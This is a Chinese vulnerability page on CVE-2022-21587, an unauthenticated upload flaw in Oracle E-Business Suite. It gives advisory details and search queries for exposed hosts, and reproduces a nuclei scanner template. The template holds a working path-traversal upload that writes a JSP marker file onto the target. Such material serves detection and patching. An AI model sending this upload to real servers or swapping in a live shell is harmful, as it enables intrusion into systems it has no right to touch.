Oracle E-Business Suite Remote Code Execution Vulnerability

漏洞信息

漏洞名称: Oracle E-Business Suite Remote Code Execution Vulnerability

漏洞编号:

  • CVE: CVE-2022-21587

漏洞类型: 命令执行

漏洞等级: 严重

漏洞描述: Oracle E-Business Suite是一个综合的企业级应用软件套件,广泛用于全球各大企业的财务管理、供应链管理、人力资源管理等关键业务操作。它支持企业实现业务流程的自动化和优化,是企业资源规划(ERP)领域的重要解决方案之一。该漏洞存在于Oracle Web Applications Desktop Integrator产品的上传组件中,允许攻击者通过HTTP网络访问执行恶意代码,无需必要的凭证即可完全控制受影响的系统。

漏洞的技术根源在于上传组件未对用户提交的文件进行充分的验证和过滤,导致攻击者可以上传恶意文件并执行任意代码。这种类型的漏洞通常由于缺乏严格的输入验证和安全编码实践造成,使得攻击者能够利用系统漏洞进行远程代码执行。

此漏洞的影响极为严重,攻击者可以利用它执行任意代码,获取敏感信息,修改数据,甚至完全控制受影响的系统。由于攻击不需要任何形式的认证,因此可以被自动化工具大规模利用,对企业的信息安全构成重大威胁。企业应立即应用Oracle提供的安全补丁以防范此漏洞的潜在风险。

产品厂商: Oracle

产品名称: Oracle E-Business Suite

影响版本: 12.2.3 through 12.2.11

搜索语法: http.title:”login” “x-oracle-dms-ecid” 200

来源: https://github.com/projectdiscovery/nuclei-templates/blob/2ec38e7e552e240343537693282608e360ca1e65/http%2Fcves%2F2022%2FCVE-2022-21587.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71

id: CVE-2022-21587

info:
name: Oracle E-Business Suite 12.2.3 -12.2.11 - Remote Code Execution
author: rootxharsh,iamnoooob,pdresearch,dogasantos
severity: critical
description: |
Oracle E-Business Suite 12.2.3 through 12.2.11 is susceptible to remote code execution via the Oracle Web Applications Desktop Integrator product, Upload component. An attacker with HTTP network access can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
remediation: |
Apply the necessary security patches provided by Oracle to mitigate this vulnerability.
reference:
- https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/
- https://www.oracle.com/security-alerts/cpuoct2022.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-21587
- http://packetstormsecurity.com/files/171208/Oracle-E-Business-Suite-EBS-Unauthenticated-Arbitrary-File-Upload.html
- https://github.com/manas3c/CVE-POC
- https://attackerkb.com/topics/Bkij5kK1qK/cve-2022-21587/rapid7-analysis?utm_source=rapid7site&utm_medium=referral&utm_campaign=etr_cve-2022-21587
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-21587
cwe-id: CWE-306
epss-score: 0.97364
epss-percentile: 0.99901
cpe: cpe:2.3:a:oracle:e-business_suite:*:*:*:*:*:*:*:*
metadata:
max-request: 3
vendor: oracle
product: e-business_suite
shodan-query: http.title:"login" "x-oracle-dms-ecid" 200
fofa-query: title="login" "x-oracle-dms-ecid" 200
google-query: intitle:"login" "x-oracle-dms-ecid" 200
tags: cve,cve2022,intrusive,ebs,unauth,kev,rce,oast,oracle,packetstorm

http:
- raw:
- |
POST /OA_HTML/BneOfflineLOVService?bne:uueupload=true HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv

------WebKitFormBoundaryZsMro0UsAQYLDZGv
Content-Disposition: form-data; name="bne:uueupload"

TRUE
------WebKitFormBoundaryZsMro0UsAQYLDZGv
Content-Disposition: form-data; name="uploadfilename";filename="taintedlove.zip"

begin 644 taintedlove.zip
M4$L#!!0``````$1QRUK1ELZ-30```$T```!*````+BXO+BXO+BXO+BXO+BXO
M1DU77TAO;64O3W)A8VQE7T5"4RUA<'`Q+V%P<&QI8V%T:6]N<R]F;W)M<R]F
M;W)M<R]T86EN="YJ<W!C870@/B!T86EN="YJ<W`*/"4*("`@(&]U="YP<FEN
M="@B,#8Q96$S,#8M-#9E9BTQ,68P+6%D.30M9C-D,3@S8C`V.#EA(BD["B4^
M"E!+`0(4`Q0``````$1QRUK1ELZ-30```$T```!*``````````````"D@0``
M```N+B\N+B\N+B\N+B\N+B]&35=?2&]M92]/<F%C;&5?14)3+6%P<#$O87!P
M;&EC871I;VYS+V9O<FUS+V9O<FUS+W1A:6YT+FIS<%!+!08``````0`!`'@`
(``"U````````
`
end
------WebKitFormBoundaryZsMro0UsAQYLDZGv--
- |
GET /forms/taint.jsp HTTP/1.1
Host: {{Hostname}}

matchers:
- type: word
part: body_2
words:
- 061ea306-46ef-11f0-ad94-f3d183b0689a


Oracle E-Business Suite Remote Code Execution Vulnerability
http://example.com/2025/07/21/github_1811226256/
作者
lianccc
发布于
2025年7月21日
许可协议